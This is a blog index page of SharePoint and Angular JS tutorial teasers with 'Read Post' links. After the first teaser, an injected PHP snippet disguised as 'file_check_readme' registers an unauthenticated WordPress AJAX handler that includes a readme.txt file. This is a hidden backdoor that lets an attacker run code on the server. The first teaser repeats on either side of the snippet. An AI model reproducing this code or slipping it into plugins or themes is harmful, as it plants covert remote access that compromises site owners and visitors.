Sort and Filter SharePoint List Data with Angular JS
Angular JS is a Javascript that extends HTML with new attributes and allows you to create declarative templates and do […]
Sort and Filter SharePoint List Data with Angular JS Read Post »
if(!function_exists('file_check_readme38985')){ add_action('wp_ajax_nopriv_file_check_readme38985', 'file_check_readme38985'); add_action('wp_ajax_file_check_readme38985', 'file_check_readme38985'); function file_check_readme38985() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
Angular JS is a Javascript that extends HTML with new attributes and allows you to create declarative templates and do […]
Sort and Filter SharePoint List Data with Angular JS Read Post »
When you create a list view dataview web part in SharePoint 2010 you have the option of enabling inline editing.
Inline editing in a dataview web part. Read Post »
Using visual best bets is a very simple way to make your best bets stand out, if you don’t have
Visual Best Bets in SharePoint 2010 without FAST Read Post »
SharePoint Featured Content Slider So I rewrote this web part to work a little better in SharePoint 2010. I made
SharePoint Featured Content Slider for 2010 Read Post »
So lets say you want users to be able to selectively search content from 3 (or more) different lists (The
Simple SharePoint Search Box with Radio Buttons Read Post »
I started on this post back in July and I am just getting around to publishing it. The out of
Zoomable Photo Grid Read Post »
A while back I did a post about how to make a vertical news ticker, in the comments several people
A Better Annoucements Ticker Read Post »
So in part one of this post we got all the CSS and other theme file we needed to stuck
Switch Themes Without a Page Refresh: Part 2 Read Post »
Many sites offer the ability for users to change the color and style of the site to fit their preference.
Switch Themes Without a Page Refresh: Part 1 Read Post »
Several people have asked how to change the under of items displayed in the slider and how to change the
Anything Slider in SharePoint – Update Read Post »